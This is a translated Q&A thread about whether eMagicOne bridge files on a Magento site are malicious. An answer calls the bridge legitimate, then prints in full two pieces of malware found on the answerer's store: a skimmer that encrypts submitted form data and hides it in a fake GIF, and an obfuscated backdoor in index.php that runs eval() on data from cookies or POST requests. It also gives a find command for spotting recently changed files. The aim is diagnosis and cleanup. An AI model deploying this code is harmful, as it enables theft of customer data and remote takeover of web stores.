Question

我们已经将文件添加到我们的Magento目录中，并且我希望找到执行此操作的恶意代码。我注意到一些“桥”文件不在原始的Magento开箱即用软件包中。这些看起来有恶意吗？或者他们是真的吗？代码似乎允许连接到我的数据库。

任何建议表示赞赏。

包含了文件的屏幕截图，这是一段代码的片段。

<?php
/*-----------------------------------------------------------------------------+
| eMagicOne                                                                 |
| Copyright (c) 2012-2014 eMagicOne.com <contact@emagicone.com>             |
| All rights reserved                                                         |
+------------------------------------------------------------------------------+
|                                                                             |
| PHP MySQL Bridge                                                           |
|                                                                             |
| Bridge is just another way to connect to your database.                     |
| Normally program uses direct MySQL connection to remote database installed at|
| website or some other web server. In some cases this type of connection does |
| not work - your hosting provider may not allow direct connections or your |
| LAN settings/firewall prevent connection from being established.           |
| Bridge allows you to work with remote database with                         |
| no direct MySQL connection established.                                     |
|                                                                             |
|                                                                             |
| Developed by eMagicOne,                                                     |
| Copyright (C) 2012-2014                                                     |
+-----------------------------------------------------------------------------*/

$version = '$Revision: 7.39 $';

// Please change immediately
// it is security threat to leave these values as is!
$username = 'NewUser';
$password = 'ebykrwfe443ewf';

$database_extension = 'auto'; // 'auto', 'pdo', 'mysqli', 'mysql'

// Please create this directory or change to any existing temporary directory
// temporary directory should be writable by php script (chmod 0777)
$temporary_dir = "./tmp"; // on some systems if you get output with 0 size, try to use some local temporary folder

$allow_compression = true;

//Values of $compress_level between 1 and 9 will trade off speed and efficiency, and the default is 6.
//The 1 flag means "fast but less efficient" compression, and 9 means "slow but most efficient" compression.
$compress_level = 6; // 1 - 9

$limit_query_size = 8192; //Kb
// Please enter your email address here to receive notifications
//$user_email = 'YOUR@EMAIL-HERE.com';

// You can define table prefix here - only tables with names starting with these characters will be stored by bridge and transferred to Store Manager.
// Empty this value to tell bridge to use all tables except for those specified in $exclude_db_tables below
// $include_db_tables = '';

/*
    Please uncomments following database connection information if you need to connect to some
    specific database or with some specific database login information.
    By default PHP MySQL Bridge is getting login information from your shopping cart.
    This option should be used on non-standard configuration, we assume you know what you are doing
*/

/*
define('USER_DB_SERVER',''); // database host to connect
define('USER_DB_SERVER_USERNAME',''); // database user login to connect
define('USER_DB_SERVER_PASSWORD',''); // database user password to connect
define('USER_DB_DATABASE','');        // database name
define('USER_TABLE_PREFIX','');       // database prefix
*/

// Do not store tables specified below. Use this variable to reduce size of the data retrieved from bridge
// Specify table names delimited by semicolon ;
$exclude_db_tables = 'log_*;dataflow_*;xcart_sessions_data;xcart_session_history;xcart_stats_shop;xcart_stats_pages_views;xcart_stats_pages;xcart_stats_pages_paths;amazonimport_*;bcse_catalog_sessions;bcse_catalog_config;google_*;zen_uti;zen_uti_*;emo_admin;emo_admin_*;emo_user_*;admin_activity_log';

// In case ifyou have problems with data retrieving change this to a single quote
define('QOUTE_CHAR', '"');

error_reporting(E_ERROR | E_WARNING | E_PARSE); //good (and pretty enough) for most hostings

if(!ini_get('safe_mode')) {
    @set_time_limit(0); //no time limiting for script, doesn't work in safe mode
} else {
    @ini_set('max_execution_time'

Answer 1

这个PHP程序是一个Legit程序。如何使用它可能不是。

eMagicOne提供了一种解决方案，允许用户远程连接到MySQL数据库，其中主机不允许直接连接。

您可以使用它来绕过该限制。与其他一些恶意代码一起编译，这是黑客企图出错的标志。

我运行过时的Magento版本（原因不止一个）每天扫描完成以检查修改的文件和添加的文件。标记为以下代码插入以下文件：

$y0='./skin/adminhtml/default/default/images/pager_arrow_right_bg.gif';$m1='1393068974';$k2='pd393b57';$k3="-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";if(@$_SERVER['HTTP_USER_AGENT']=='Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'){if(isset($_GET[$k2])){$m1=file_exists($y0)?@filemtime($y0):$m1;@file_put_contents($y0,'');@touch($y0,$m1,$m1);echo 'clean ok';}else echo 'Pong';exit;}if(!empty($_SERVER['HTTP_CLIENT_IP'])){$i4=$_SERVER['HTTP_CLIENT_IP'];}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){$i4=$_SERVER['HTTP_X_FORWARDED_FOR'];}else{$i4=@$_SERVER['REMOTE_ADDR'];}if(isset($_POST)&&sizeof($_POST)){$a5='';foreach($_POST as $h6=>$n7){if(is_array($n7)){foreach($n7 as $f8=>$l9){if(is_array($l9)){foreach($l9 as $l10=>$v11){if(is_array($v11)){;}else{$a5.=':'.$h6.'['.$f8.']['.$l10.']='.$v11;}}}else{$a5.=':'.$h6.'['.$f8.']='.$l9;}}}else{$a5.=':'.$h6.'='.$n7;}}$a5=$i4.$a5;}else{$a5=null;}if($a5){$t12=false;if(function_exists('openssl_get_publickey')&&function_exists('openssl_public_encrypt')&&function_exists('openssl_encrypt')){$t12=true;}elseif(function_exists('dl')){$n13=strtolower(substr(php_uname(),0,3));$d14='php_openssl.'.($n13=='win'?'dll':'so');@dl($d14);if(function_exists('openssl_get_publickey')&&function_exists('openssl_public_encrypt')&&function_exists('openssl_encrypt')){$t12=true;}}if($t12){$t15=@openssl_get_publickey($k3);$q16=128;$t17='';$h18=md5(md5(microtime()).rand());$e19=$h18;while($e19){$f20=substr($e19,0,$q16);$e19=substr($e19,$q16);@openssl_public_encrypt($f20,$h21,$t15);$t17.=$h21;}$t22=@openssl_encrypt($a5,'aes128',$h18);@openssl_free_key($t15);$a5=$t17.':::SEP:::'.$t22;}$m1=file_exists($y0)?@filemtime($y0):$m1;@file_put_contents($y0,'JPEG-1.1'.base64_encode($a5),FILE_APPEND);@touch($y0,$m1,$m1);}?><?php

这位于/ include / config中，我在Index和mage文件中有一些代码（我在几个小时前清理过来，没有日志）

最好的选择是尝试从Web目录根运行：

find . -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

这将扫描您当前的PHP文件并按修改日期顺序对它们进行排序，在列表底部您应该看到最近修改过的文件。您可以使用它来检查文件的内容。

示例：

find . -type f  -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort

查找 - 搜索程序
。 =从当前目录
type f =文件类型
name =使用'* .php'
printf + expression（以可读格式打印日期）
| =要堆叠另一个命令
sort =按顺序显示结果（列表底部的最新文件）

从Index.php添加了原始代码

 $GLOBALS['icbb'];global$icbb;$icbb=$GLOBALS;$icbb['xf558f']="\x68\x63\x21\x7d\x67\xa\x43\x33\x57\x2f\x73\x61\x52\x59\x22\x6d\x2a\x32\x64\x49\x27\x3d\x28\x40\x50\x24\x51\x7b\x3e\x60\x72\x37\x58\x6f\x44\x62\x76\x20\x9\x45\x6b\x6e\x56\x70\x34\x4b\x41\x4d\x23\x4a\x2b\x78\x7c\x71\x39\x69\x2c\x48\x4c\x6c\xd\x3a\x55\x3b\x53\x42\x38\x77\x25\x4e\x7a\x74\x36\x2d\x31\x5a\x7e\x54\x79\x35\x65\x5c\x3f\x5b\x5e\x66\x4f\x46\x47\x3c\x30\x6a\x29\x75\x26\x5f\x5d\x2e";$icbb[$icbb['xf558f'][36].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][90].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][11]]=$icbb['xf558f'][1].$icbb['xf558f'][0].$icbb['xf558f'][30];$icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]=$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][18];$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]=$icbb['xf558f'][10].$icbb['xf558f'][71].$icbb['xf558f'][30].$icbb['xf558f'][59].$icbb['xf558f'][80].$icbb['xf558f'][41];$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]=$icbb['xf558f'][55].$icbb['xf558f'][41].$icbb['xf558f'][55].$icbb['xf558f'][95].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][71];$icbb[$icbb['xf558f'][59].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][35].$icbb['xf558f'][17].$icbb['xf558f'][54].$icbb['xf558f'][54].$icbb['xf558f'][74]]=$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][55].$icbb['xf558f'][11].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][70].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][93].$icbb['xf558f'][1].$icbb['xf558f'][35].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][85]]=$icbb['xf558f'][43].$icbb['xf558f'][0].$icbb['xf558f'][43].$icbb['xf558f'][36].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][10].$icbb['xf558f'][55].$icbb['xf558f'][33].$icbb['xf558f'][41];$icbb[$icbb['xf558f'][11].$icbb['xf558f'][17].$icbb['xf558f'][17].$icbb['xf558f'][80].$icbb['xf558f'][74].$icbb['xf558f'][11]]=$icbb['xf558f'][93].$icbb['xf558f'][41].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][55].$icbb['xf558f'][11].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][70].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][33].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][18].$icbb['xf558f'][17].$icbb['xf558f'][35].$icbb['xf558f'][44].$icbb['xf558f'][11]]=$icbb['xf558f'][35].$icbb['xf558f'][11].$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][72].$icbb['xf558f'][44].$icbb['xf558f'][95].$icbb['xf558f'][18].$icbb['xf558f'][80].$icbb['xf558f'][1].$icbb['xf558f'][33].$icbb['xf558f'][18].$icbb['xf558f'][80];$icbb[$icbb['xf558f'][53].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][79]]=$icbb['xf558f'][10].$icbb['xf558f'][80].$icbb['xf558f'][71].$icbb['xf558f'][95].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][80].$icbb['xf558f'][95].$icbb['xf558f'][59].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][55].$icbb['xf558f'][71];$icbb[$icbb['xf558f'][93].$icbb['xf558f'][7].$icbb['xf558f'][1].$icbb['xf558f'][31].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][72].$icbb['xf558f'][79]]=$icbb['xf558f'][43].$icbb['xf558f'][85].$icbb['xf558f'][54].$icbb['xf558f'][85];$icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]=$icbb['xf558f'][91].$icbb['xf558f'][1].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][74].$icbb['xf558f'][18].$icbb['xf558f'][44].$icbb['xf558f'][74];$icbb[$icbb['xf558f'][4].$icbb['xf558f'][7].$icbb['xf558f'][31].$icbb['xf558f'][18].$icbb['xf558f'][7].$icbb['xf558f'][85].$icbb['xf558f'][85].$icbb['xf558f'][11].$icbb['xf558f'][7]]=$_POST;$icbb[$icbb['xf558f'][15].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][7].$icbb['xf558f'][72]]=$_COOKIE;@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][30].$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][95].$icbb['xf558f'][59].$icbb['xf558f'][33].$icbb['xf558f'][4],NULL);@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][59].$icbb['xf558f'][33].$icbb['xf558f'][4].$icbb['xf558f'][95].$icbb['xf558f'][80].$icbb['xf558f'][30].$icbb['xf558f'][30].$icbb['xf558f'][33].$icbb['xf558f'][30].$icbb['xf558f'][10],0);@$icbb[$icbb['xf558f'][51].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][74].$icbb['xf558f'][85]]($icbb['xf558f'][15].$icbb['xf558f'][11].$icbb['xf558f'][51].$icbb['xf558f'][95].$icbb['xf558f'][80].$icbb['xf558f'][51].$icbb['xf558f'][80].$icbb['xf558f'][1].$icbb['xf558f'][93].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][33].$icbb['xf558f'][41].$icbb['xf558f'][95].$icbb['xf558f'][71].$icbb['xf558f'][55].$icbb['xf558f'][15].$icbb['xf558f'][80],0);@$icbb[$icbb['xf558f'][53].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][79]](0);$w8a038788=NULL;$s379c4839=NULL;$icbb[$icbb['xf558f'][15].$icbb['xf558f'][74].$icbb['xf558f'][31].$icbb['xf558f'][90].$icbb['xf558f'][85].$icbb['xf558f'][80].$icbb['xf558f'][11].$icbb['xf558f'][90]]=$icbb['xf558f'][72].$icbb['xf558f'][18].$icbb['xf558f'][72].$icbb['xf558f'][44].$icbb['xf558f'][11].$icbb['xf558f'][72].$icbb['xf558f'][11].$icbb['xf558f'][18].$icbb['xf558f'][73].$icbb['xf558f'][7].$icbb['xf558f'][11].$icbb['xf558f'][72].$icbb['xf558f'][79].$icbb['xf558f'][73].$icbb['xf558f'][44].$icbb['xf558f'][72].$icbb['xf558f'][85].$icbb['xf558f'][54].$icbb['xf558f'][73].$icbb['xf558f'][54].$icbb['xf558f'][44].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][73].$icbb['xf558f'][44].$icbb['xf558f'][31].$icbb['xf558f'][90].$icbb['xf558f'][66].$icbb['xf558f'][44].$icbb['xf558f'][18].$icbb['xf558f'][85].$icbb['xf558f'][79].$icbb['xf558f'][1].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][74];global$m170fea0;function jc9f1d41($w8a038788,$b4da298e){global$icbb;$vde7a7="";for($u99f5bd=0;$u99f5bd<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($w8a038788);){for($jca175=0;$jca175<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($b4da298e)&&$u99f5bd<$icbb[$icbb['xf558f'][71].$icbb['xf558f'][7].$icbb['xf558f'][66].$icbb['xf558f'][80].$icbb['xf558f'][18]]($w8a038788);$jca175++,$u99f5bd++){$vde7a7.=$icbb[$icbb['xf558f'][36].$icbb['xf558f'][11].$icbb['xf558f'][54].$icbb['xf558f'][90].$icbb['xf558f'][79].$icbb['xf558f'][11].$icbb['xf558f'][11]]($icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]($w8a038788[$u99f5bd])^$icbb[$icbb['xf558f'][35].$icbb['xf558f'][80].$icbb['xf558f'][31].$icbb['xf558f'][79].$icbb['xf558f'][90].$icbb['xf558f'][72].$icbb['xf558f'][90].$icbb['xf558f'][90]]($b4da298e[$jca175]));}}return$vde7a7;}function pf9f($w8a038788,$b4da298e){global$icbb;global$m170fea0;return$icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]($icbb[$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][18].$icbb['xf558f'][54].$icbb['xf558f'][18].$icbb['xf558f'][79].$icbb['xf558f'][79].$icbb['xf558f'][18].$icbb['xf558f'][7]]($w8a038788,$m170fea0),$b4da298e);}foreach($icbb[$icbb['xf558f'][15].$icbb['xf558f'][79].$icbb['xf558f'][54].$icbb['xf558f'][7].$icbb['xf558f'][72]]as$b4da298e=>$a8d45c){$w8a038788=$a8d45c;$s379c4839=$b4da298e;}if(!$w8a038788){foreach($icbb[$icbb['xf558f'][4].$icbb['xf558f'][7].$icbb['xf558f'][31].$icbb['xf558f'][18].$icbb['xf558f'][7].$icbb['xf558f'][85].$icbb['xf558f'][85].$icbb['xf558f'][11].$icbb['xf558f'][7]]as$b4da298e=>$a8d45c){$w8a038788=$a8d45c;$s379c4839=$b4da298e;}}$w8a038788=@$icbb[$icbb['xf558f'][11].$icbb['xf558f'][17].$icbb['xf558f'][17].$icbb['xf558f'][80].$icbb['xf558f'][74].$icbb['xf558f'][11]]($icbb[$icbb['xf558f'][93].$icbb['xf558f'][7].$icbb['xf558f'][1].$icbb['xf558f'][31].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][72].$icbb['xf558f'][79]]($icbb[$icbb['xf558f'][33].$icbb['xf558f'][35].$icbb['xf558f'][90].$icbb['xf558f'][18].$icbb['xf558f'][17].$icbb['xf558f'][35].$icbb['xf558f'][44].$icbb['xf558f'][11]]($w8a038788),$s379c4839));if(isset($w8a038788[$icbb['xf558f'][11].$icbb['xf558f'][40]])&&$m170fea0==$w8a038788[$icbb['xf558f'][11].$icbb['xf558f'][40]]){if($w8a038788[$icbb['xf558f'][11]]==$icbb['xf558f'][55]){$u99f5bd=Array($icbb['xf558f'][43].$icbb['xf558f'][36]=>@$icbb[$icbb['xf558f'][93].$icbb['xf558f'][1].$icbb['xf558f'][35].$icbb['xf558f'][54].$icbb['xf558f'][85].$icbb['xf558f'][85]](),$icbb['xf558f'][10].$icbb['xf558f'][36]=>$icbb['xf558f'][74].$icbb['xf558f'][97].$icbb['xf558f'][90].$icbb['xf558f'][73].$icbb['xf558f'][74],);echo@$icbb[$icbb['xf558f'][59].$icbb['xf558f'][66].$icbb['xf558f'][74].$icbb['xf558f'][35].$icbb['xf558f'][17].$icbb['xf558f'][54].$icbb['xf558f'][54].$icbb['xf558f'][74]]($u99f5bd);}elseif($w8a038788[$icbb['xf558f'][11]]==$icbb['xf558f'][80]){eval($w8a038788[$icbb['xf558f'][18]]);}exit();} ?><?php

此代码通常放在第1行：完成所有评论后，向右滚动。

这个Magento代码是病毒吗？

1 个答案: